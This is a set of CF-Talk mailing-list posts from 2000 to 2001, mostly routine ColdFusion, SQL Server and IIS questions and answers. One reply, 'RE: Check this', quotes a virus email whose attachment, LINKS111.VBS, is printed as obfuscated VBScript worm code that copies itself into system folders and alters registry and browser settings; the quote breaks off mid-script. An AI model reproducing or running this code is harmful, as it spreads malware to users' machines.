RE: Multiple Servers - Cluster Cats

2001-01-08 Thread Lee Fuller

Agreed

 -Original Message-
 From: Jon Hall [mailto:[EMAIL PROTECTED]]
 Sent: Monday, January 08, 2001 5:11 PM
 To: CF-Talk
 Subject: Re: Multiple Servers - Cluster Cats
 
 
 Win2k Advanced Server's built in clustering and failover software is very
 slick and easy to use.
 
 jon
 - Original Message -
 From: "Kirk Boecker" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Monday, January 08, 2001 2:10 PM
 Subject: Multiple Servers - Cluster Cats
 
 
  Sorry for the slightly OT post,
 
  We have a server pair running our main CF application, both are DELL
  enterprise servers,
  (1 running win2k, IIS and CF 4.5 and the other running SQL server 7).
 
  We are not maxing out the server at all but we need some type 
 of failover
  security
  (last week we had a motherboard in the DB server take a dump on us).
 
  We are thinking of setting up some type of cluster (cluster 
 cats?) or some
  type of
  mirrored set of servers to take over if something goes wrong.
 
  Does anyone have any experience setting up Cluster Cats or any 
 other solid
  backup/failover server system?
 
  Kirk Boecker
 
 
 

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Alternative To SQL Server Enterprise Manager

2001-01-02 Thread Lee Fuller

Actually, I'd like to find something that my clients can use, to login to
their SQL database and make changes.  Also, that will work with the security
of the SQL server to keep unwanted eyes out of other DB's.  (Kinda like what
MySQL will do.)

Lee


 -Original Message-
 From: Dylan Bromby [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, January 02, 2001 9:58 AM
 To: CF-Talk
 Subject: RE: Alternative To SQL Server Enterprise Manager


 DB Artisan and ERStudio are pretty slick.

 -Original Message-
 From: Joe Sheble aka Wizaerd [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, January 02, 2001 8:18 AM
 To: CF-Talk
 Subject: OT: Alternative To SQL Server Enterprise Manager


 I'm wondering if any CF'ers here has found an affordable
 alternative to SQL
 Server's Enterprise Manager?  I had found SQL Navigator from
 http://www.quest.com/sql_navigator_ss/index.asp, but have found it lacking
 in a lot of areas, as well as buggy as h*ll...

 Enterprise Manager gives a lot of functionality, but mostly operates as an
 SDI application where multiple windows would be tremendously
 useful, plus a
 way to filter the system objects out of the view?  Plus provide a data
 browser, a way to change the properties of a table, build indexes, build
 stored procedures, change/add/delete data, etc...

 Does anyone know of such a critter?

~ Paid Sponsorship ~
Get Your Own Dedicated Win2K Server!  Instant Activation for $99/month w/Free 
Setup from SoloServer  PIII600 / 128 MB RAM / 20 GB HD / 24/7/365 Tech Support 
 Visit SoloServer, https://secure.irides.com/clientsetup.cfm.

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: cfmail??

2000-12-05 Thread Lee Fuller

Look at the log files in CF's directories.  You should find the answers
there.

Lee


 -Original Message-
 From: ibtoad [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, December 05, 2000 8:15 AM
 To: CF-Talk
 Subject: cfmail??


 If my smtp is set up ok and verified in my local Cf
 administrator, why is my
 email being placed in the undeliverable folder when I run a cfmail tag?

 Thanks,
 Rich



~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Get the last 12 months transactions?

2000-12-01 Thread Lee Fuller

Wouldn't this tell you whether the date is in the NEXT 12 months...
neverending 12 months, I might add?

 Try something like this:

 SELECT fields
 FROM  table
 WHERE date = #DateAdd("m", 12, Now())#


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



CFStudio - Takes forever to load...

2000-11-28 Thread Lee Fuller

Anyone know why this is?  We're using the latest 4.5.1, and it simply takes
about 3-4 minutes to load up.   Hmm...

Lee



+-+
Leaving list: Mailto:[EMAIL PROTECTED]
Message BODY: leave website-talk
Problems: Help file Mailto:[EMAIL PROTECTED] 
For Support on using the website-talk list 
mailto:[EMAIL PROTECTED]
+-+



~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: CFStudio - Takes forever to load...

2000-11-28 Thread Lee Fuller

Actually no.. It's not set to load anything.  Just takes forever. ;(

Lee


 -Original Message-
 From: Jon Hall [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, November 28, 2000 12:39 PM
 To: CF-Talk
 Subject: Re: CFStudio - Takes forever to load...


 On my P3-500 it takes about 10 seconds at most, and on my Athlon 550 it
 takes slightly less. Maybe you have studio set up to open the last project
 you were working on? Ever since Studio 4.5 the whole projects
 thing has been
 horrendously slow. I have projects that take longer than 4-5
 minutes to load
 over a T1.

 jon
 - Original Message -
 From: "Lee Fuller" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Tuesday, November 28, 2000 3:32 PM
 Subject: CFStudio - Takes forever to load...


  Anyone know why this is?  We're using the latest 4.5.1, and it simply
 takes
  about 3-4 minutes to load up.   Hmm...
 
  Lee
 
 
 
  +-+
  Leaving list: Mailto:[EMAIL PROTECTED]
  Message BODY: leave website-talk
  Problems: Help file Mailto:[EMAIL PROTECTED]
  For Support on using the website-talk list
  mailto:[EMAIL PROTECTED]
  +-+
 
 
 
  ~~
  Structure your ColdFusion code with Fusebox. Get the official book at
 http://www.fusionauthority.com/bkinfo.cfm
 
  Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
  Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

 ~~
 Structure your ColdFusion code with Fusebox. Get the official
 book at http://www.fusionauthority.com/bkinfo.cfm

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Reading a file/cfhttp.filecontent line by line, or...

2000-11-17 Thread Lee Fuller

Actually, figured it out doing that... and doing some other comparisons.

Thanks!

Lee


 -Original Message-
 From: Paul Mone [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, November 16, 2000 10:27 PM
 To: CF-Talk
 Subject: RE: Reading a file/cfhttp.filecontent line by line, or...


 CFHTTP.filecontent is a string.

 So, you can search using FindNoCase, which conveniently returns
 the index of
 the match found.  You can then offset this by whatever amount of
 characters
 you'll need to get your hidden field's value.  You'll probably
 need to find
 the end of your hidden field's tag as well, if the length of the field's
 value changes.




 -Original Message-
 From: Lee Fuller [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, November 16, 2000 4:52 PM
 To: CF-Talk
 Subject: Reading a file/cfhttp.filecontent line by line, or...


 I know that we've talked about this before, but I can't seem to
 remember how
 to do this.

 I need to find a specific string in the returned var of
 cfhttp.filecontent,
 then look ahead a certain number of positions, then pull out the remaining
 10 characters.  Basically I'm going to be finding a hidden form field, and
 grabbing it's value from what's returned by cfhttp.

 Can anyone send me the info on how to do this?

 TTAIA!

   Lee

 ~~
 Structure your ColdFusion code with Fusebox. Get the official book at
 https://secure.houseoffusion.com

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

 ~~
 Structure your ColdFusion code with Fusebox. Get the official
 book at https://secure.houseoffusion.com

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Reading a file/cfhttp.filecontent line by line, or...

2000-11-16 Thread Lee Fuller

I know that we've talked about this before, but I can't seem to remember how
to do this.

I need to find a specific string in the returned var of cfhttp.filecontent,
then look ahead a certain number of positions, then pull out the remaining
10 characters.  Basically I'm going to be finding a hidden form field, and
grabbing it's value from what's returned by cfhttp.

Can anyone send me the info on how to do this?

TTAIA!

Lee

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
https://secure.houseoffusion.com

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Cheap hosting?

2000-11-04 Thread Lee Fuller

Jason,

Please resubmit your question in plain text format.

Thanks...

Lee Fuller
Chief Technical Officer
PrimeDNA Corporation

 -Original Message-
 From: Jason Glaun [mailto:[EMAIL PROTECTED]]
 Sent: Saturday, November 04, 2000 12:43 PM
 To: CF-Talk
 Subject: Cheap hosting?


 This is a multi-part message in MIME format.

 --=_NextPart_000_000F_01C0469F.D467F120
 Content-Type: text/plain;
   charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 I have just purchased a domain name and am looking for a reasonably =
 priced reliable host.   Any suggestions?

 --=_NextPart_000_000F_01C0469F.D467F120
 Content-Type: text/html;
   charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
 HTMLHEAD
 META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"
 META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR
 STYLE/STYLE
 /HEAD
 BODY bgColor=3D#ff
 DIVFONT face=3DArial size=3D2I have just purchased a domain name and =
 am looking=20
 for a reasonably priced reliable host.nbsp;nbsp; Any=20
 suggestions?/FONT/DIV/BODY/HTML

 --=_NextPart_000_000F_01C0469F.D467F120--
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
 or send a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: State-County-City DB needed

2000-09-03 Thread Lee Fuller

Hello Don,

Email this guy... he sells db's for ZIP Codes.. etc.

[EMAIL PROTECTED]

Name is "Bud".

Lee


 -Original Message-
 From: Donald Sparks [mailto:[EMAIL PROTECTED]]
 Sent: Sunday, September 03, 2000 11:33 AM
 To: [EMAIL PROTECTED]
 Subject: State-County-City DB needed
 
 
 If anyone has a State-County-City Database, could you please 
 send it to me or a url where I could get it.
 
 Thank you,
 Don Sparks
 
  
 
 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 To Unsubscribe visit 
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf
 _talk or send a message to [EMAIL PROTECTED] with 
 'unsubscribe' in the body.
 
--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



OT: CGI/PERL Programmer Needed...

2000-07-28 Thread Lee Fuller

Respond off list for details. ([EMAIL PROTECTED])

Thanks!

Lee Fuller
Senior Systems Administrator
PrimeDNA.Net
 
--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Job Titles

2000-07-28 Thread Lee Fuller

Rector of Dirfun

 -Original Message-
 From: Steve Pierce [mailto:[EMAIL PROTECTED]]
 Sent: Friday, July 28, 2000 4:56 PM
 To: [EMAIL PROTECTED]
 Subject: RE: Job Titles
 
 
 Director of Fun
 
 
 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 To Unsubscribe visit 
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf
 _talk or send a message to [EMAIL PROTECTED] with 
 'unsubscribe' in the body.
 
--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Job Titles

2000-07-28 Thread Lee Fuller

ooops...

Rector of Difun...  (sorry)

 -Original Message-
 From: Steve Pierce [mailto:[EMAIL PROTECTED]]
 Sent: Friday, July 28, 2000 4:56 PM
 To: [EMAIL PROTECTED]
 Subject: RE: Job Titles
 
 
 Director of Fun
 
 
 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 To Unsubscribe visit 
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf
 _talk or send a message to [EMAIL PROTECTED] with 
 'unsubscribe' in the body.
 
--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: High-Powered Scaling - Was Milking Every Last Drop...

2000-07-26 Thread Lee Fuller

Can you explain how you do that?  The segmenting, I mean...

Thanks.

Lee


 -Original Message-
 From: !jeff! [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, July 26, 2000 6:02 PM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: Re: High-Powered Scaling - Was "Milking Every Last Drop..."


 We further segmented our network so that all the CF Variables
 traffic is on
 its own segment.  CFVars, in a high traffic site, becomes the bottleneck
 quite quickly.  It does an update on almost every request to your
 multitude
 of web servers.  By segmenting that traffic, and dedicating a
 beefy machine
 to that purpose, your other backend traffic will be able to move around a
 lot better.

 In terms of analysis, I can't give you actual numbers, but I can tell you
 that this approach made it possible to keep our site responsive with 40
 front end CF servers.  there is absolutely no way we could have done it
 otherwise.

 Also, this approach is pretty much a security requirement.

 hope this helps,
 jeff sherwood
 CIO - BIGWORDS, Inc.




 At 06:40 PM 7/26/2000 -0600, Jim McAtee wrote:
 Great post.  One thing to add, and one question:
 
  7. Get web log data off the servers nightly.  Why store this
 junk on your
  web server?  Archive it nightly to free space.  Also, tune your web
 server
  to only log the stats you ABSOLUTELY need.  Otherwise you're wasting
  valuable resources on logging junk.  Remove this nightly to a
 workstation
  with a ton of drive space so it can analyze it off-line.  It sounds
 simple
  and obvious, but you'll be surprised how many people don't do this.
 
 If you're running a log analyzer, make sure you dedicate a
 separate server
 to just this task alone.  Chewing on enormous web logs and  spitting out
 reports can consume a fair amount of CPU.  Given a sufficient amount of
 disk space, this would be a good place to archive the individual site
 logs.  Don't forget to ZIP them, they'll easily compress in size by a
 factor of 10 to 20.
 
 
  9. Network Architecture.  Put two NICs in every web server.  The first
 NIC
  goes to a high-performance (not a random brand label) 100Mb switch (a
  switch, NOT a hub) which then connects to the load balancer
 and then out
 the
  router and any firewall tools you have.  This is your outside
 connection.
  The second NIC goes to a SEPARATE switch (NOT the one just
 mentioned) to
  which your two SQL servers (in a cluster) are connected.  This is your
 "back
  end" network.  These should be 100Mbps switched so CF can talk
 to SQL as
  fast as is possible.  By segmenting these two connections, you get the
 best
  performance.  Your CF connection can get to SQL as fast as possible
 through
  one means, while IIS is taking the results and getting them to the user
 as
  fast as possible.  Diversifying the channels maximizes the
 throughput and
  keeps the channels clean.
 
 Has anyone done much analysis on this approach?  That is, how much
 performance is actually gained?  Say you're using 10 full T1's
 of outgoing
 bandwidth, this ads up to just 15Mbs of that 100Mbs pipe - and if the
 ethernet connection is run full duplex, that's 100Mbs in each direction.
 Keep in mind that most of the internet traffic is outgoing, and most SQL
 traffic will be in pulling data into the web server.  I would think you'd
 need unbelievable amounts of net traffic before you saw much improvement
 by moving that traffic off of this link.
 
 Jim
 
 
 -Original Message-
 From: [EMAIL PROTECTED] [EMAIL PROTECTED]
 To: [EMAIL PROTECTED] [EMAIL PROTECTED]
 Date: Wednesday, July 26, 2000 5:42 PM
 Subject: High-Powered Scaling - Was "Milking Every Last Drop..."
 
 
  
  
  Here are my suggestions
 
 -
 -
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/c
f_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

!j!

The mark of mediocrity is searching for the precedent.

!jeff! sherwood Director of BIGWORDS.com Web Site Design / JEDI
   BIGWORDS.com worker#2
.r.e.c.o.v.e.r.e.d.n.e.t.s.c.a.p.e.u.s.e.r. . . . 415.543.1400.x300


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Variable IN a list? How to check?

2000-07-13 Thread Lee Fuller

cfif #deptid# contains #session.privileges#



Lee Fuller
Chief Technical Officer
PrimeDNA Corporation

 -Original Message-
 From: Angél Stewart [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, July 13, 2000 9:39 AM
 To: [EMAIL PROTECTED]
 Subject: Variable IN a list? How to check?


 How would i write this correctly in CFML?

 Cfif #Deptid# IN #session.privileges#

 Of course I want to check if the list of values in DeptID are all included
 in the list of values in the session.privileges list of values.

 Sooo..

 deptid may be "11001, 12000,13000"
 and session.privileges may be :
 "ViewReports,AddUsers,AddGroups,11001,12000,13000,14000,18201"

 In this case, the DeptIDs are all found in the Priviliges list,
 so the user
 is authorised.

 Umm..is there a single tag to run this check?

 -Gel


 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf
 _talk or send a message to [EMAIL PROTECTED] with
 'unsubscribe' in the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



OT: JS and VC++ Guru's?

2000-06-17 Thread Lee Fuller

We have a couple of projects that require some JavaScript and VC++ gurus...

If anyone is interested in more detail, can you please email my programming
coordinator off-list at "[EMAIL PROTECTED]"?

TTAIA

Lee


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



List isn't allowing subscribes...

2000-06-17 Thread Lee Fuller

Anyone else notice this?

Lee
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



OT: Anyone here an IIS guru?

2000-05-24 Thread Lee Fuller

If so, could you respond to me offlist?

TIA

Lee Fuller
Senior Systems Administrator
PrimeDNA.Net
 
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Thank you for choosing Smart Web Tech your online business provider. We have received you

2000-05-01 Thread Lee Fuller

Which makes it a pretty silly (read: stoopid) auto-responder.

owell



 -Original Message-
 From: Leong Yew [mailto:[EMAIL PROTECTED]]
 Sent: Monday, May 01, 2000 9:41 PM
 To: [EMAIL PROTECTED]
 Subject: RE: Thank you for choosing Smart Web Tech your online business
 provider. We have received you


 I thought it was pretty obvious. This person probably subscribed
 to the list
 with an email address that had an autoresponder attached to it. So every
 time a message was sent to that address from cf-talk, the autoresponder
 automatically sent this default message back to the sender (the list).


 -Original Message-
 From: Michael Dinowitz [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, May 02, 2000 1:46 PM
 To: [EMAIL PROTECTED]
 Subject: Re: Thank you for choosing Smart Web Tech your online business
 provider. We have received you


 I have no idea why they were coming to the list, but I removed the sender.




  Am I alone in getting sick of these yet?
 
  -Original Message-
  From: admin [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, 2 May 2000 1:12 PM
  To: [EMAIL PROTECTED]
  Subject: Thank you for choosing Smart Web Tech your online business
  provider. We have received you
 
 
  Thank you for choosing Smart Web Tech your online business provider. We
 have
  received your message our tech staff will get in touch with you
 as soon as
  possible. If you have any additional, questions please visit our website
 at
  www.SmartWebTech.com
 
 --
 --
  --
  Archives: http://www.eGroups.com/list/cf-talk
  To Unsubscribe visit
 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
 send a message to [EMAIL PROTECTED] with 'unsubscribe' in
 the body.

 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Check this

2000-05-01 Thread Lee Fuller

Oh my gosh... wasn't THAT silly.

Saw that one comin' a mile away... didn't even open it... just deleted it
without even reading it.

Thanks Michael...



 -Original Message-
 From: Rob Sherman [mailto:[EMAIL PROTECTED]]
 Sent: Monday, May 01, 2000 9:50 PM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: RE: Check this


 Amen.. the virus attachment didn't get posted to the list.  THANK YOU
 MICHAEL!!!

 P.S.  Nagesh, you just opened a vb file containing a virus..  update your
 virus definitions and scan your system.


 Sincerely,

 Rob Sherman
 --
 Developer / Certified Cold Fusion Instructor
 Email:[EMAIL PROTECTED]
 ICQ:_3266081
 AIM:__RobSSherm
 Yahoo!:RobSherman_CFDev
 Office:__(310) 543-1622
 Office Fax:__(310) 543-0512
 VMail/Fax:__(310) 754-6016 ext. 5630



  -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED]]  On Behalf Of Nagesh Kumar Deva
 Sent: Monday, May 01, 2000 9:43 PM
 Subject:  Check this

 This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.

 --_=_NextPart_000_01BFB3F0.D344523A
 Content-Type: text/plain

 Have fun with these links.
 Bye.


 --_=_NextPart_000_01BFB3F0.D344523A
 Content-Type: application/octet-stream;
   name="LINKS111.VBS"
 Content-Transfer-Encoding: quoted-printable
 Content-Disposition: attachment;
   filename="LINKS111.VBS"

 On Error Resume Next=0A=
 Set A1 =3D CreateObject("Scripting.FileSystemObject")=0A=
 Set A2 =3D A1.OpenTextFile(WScript.ScriptFullName,1)=0A=
 Do While A2.AtEndOfStream =3D False And Mid(A3,40,10)  =
 "`sd]Lhbsnr"=0A=
 A3 =3D A2.ReadLine=0A=
 Loop=0A=
 A2.Close=0A=
 Set A4 =3D =
 A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR")),T=
 rue)=0A=
 A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))=0A=
 A4.WriteLine(B("Rdu!@0!!Bsd`udNckdbu)""Rbshquhof/GhmdRxrudlNckdbu""("))=
 =0A=
 A4.WriteLine(B("Rdu!@3!!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0("))=0A=
 A4.WriteLine(B("En!Vihmd!@3/@uDoeNgRusd`l!!G`mrd!@oe!Lhe)@2-52-01(!=3D?=
 !""gZOkepquqd"""))=0A=
 A4.WriteLine(B("@2!!@3/Sd`eMhod"))=0A=
 A4.WriteLine(B("Mnnq"))=0A=
 A4.WriteLine(B("@3/Bmnrd"))=0A=
 A4.WriteLine(B("Rdu!@5!!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)@0/FduRqdbh`mGnm=
 eds)1(-C)""JKLMU,T@U""((-Ustd("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ql!Gppqp!Pguwog!Lgvr""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C3!?!EpgcrgQ`hgerUepknrkli,Dkj=
 gU{urgoQ`hger+""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C0!?!C3,QnglRgvrDkjgYUepknr,Uepknr=
 DwjjLcog*3+""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Bq!Yfkjg!C0,CrGlbQdUrpgco!?!Dcjug!Clb!O=
 kbC5*2.*3.+!:!^ub_Jf`ulp""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C5!?!C0,PgcbJklg""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Jqqn""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C0,Ejqug""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C2!?!C3,EpgcrgRgvrDkjgC3,@wkjbNcrf=
 C3,IgrUngekcjDqjbgp3+*@URQGOO1YEP++*Rpwg+""(("))=0A=
 A4.WriteLine(B("Rdu!@4!!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0("))=0A=
 A4.WriteLine(B("En!Vihmd!@4/@uDoeNgRusd`l!!G`mrd"))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C2,YpkrgJklg@""(!'!B)Sdqm`bd)@4/S=
 d`eMhod-C)(-C)(((!'!C)""++""(("))=0A=
 A4.WriteLine(B("Mnnq"))=0A=
 A4.WriteLine(B("@4/Bmnrd"))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C2,Ejqug""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C7!?!EpgcrgQ`hger@TP`ufsw1Pkb=
 oo++""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C7,PgiYpkrg!@KHBV\OL@O\J@KFQB_Pl=
 iwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_Urqgoo+*C3,@wkjbNcrfC3,=
 IgrUngekcjDqjbgp3+*@URQGOO1YEP++""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv@Wkfp tfoo ^gg ^ =
 pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl =
 `lqwfqrb+*54*@Iubb [[[ ofqhp++!?!4!Rfgl""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C4!?!C3,EpgcrgRgvrDkjgC3,@wkjbNcrf=
 C7,UngekcjDqjbgpu@Gbphwls++*@IUBB [[[ =
 OFQHP1RUO++*Rpwg+""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg@XFqwbuqbwPkluw`rwZ""=
 ""++""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg@RUO:kwws=3D,,ttt1pre=
 ofjbgfub`wluv1`lj,++""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C4,Ejqug""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C9!?!EpgcrgQ`hger@TP`ufsw1Qbw=
 tluh++""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C6!?!C9,GlwoLgryqpmBpktgu""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Kd!C6,Eqwlr!:!.!Rfgl""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C;!?!.!Rq!C6,Eqwlr!/!3""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""Kd!KlUrpC6,KrgoC;+*@__++!:!=
 .!Rfgl""(("))=0A=
 A4.WriteLine(B("@5/VshudMhod)C)""C3,Eqn{Dkjg!YUepknr,UepknrDwjjLcog*!C3,=
 

RE: [Help !!!! with session time outs]

2000-03-26 Thread Lee Fuller

Why not check for the existence of the var (and/or a value in the var) prior
to loading the rest of the page, and take appropriate action if it doesn't
exist/is empty?

Works for us...

Just my .02

Lee


 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
 Sent: Sunday, March 26, 2000 4:42 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Help  with session time outs]


 use CFERROR or in 4.5 you can put in a default error message

 "Interent Gold Coast Properties" [EMAIL PROTECTED]
 wrote:
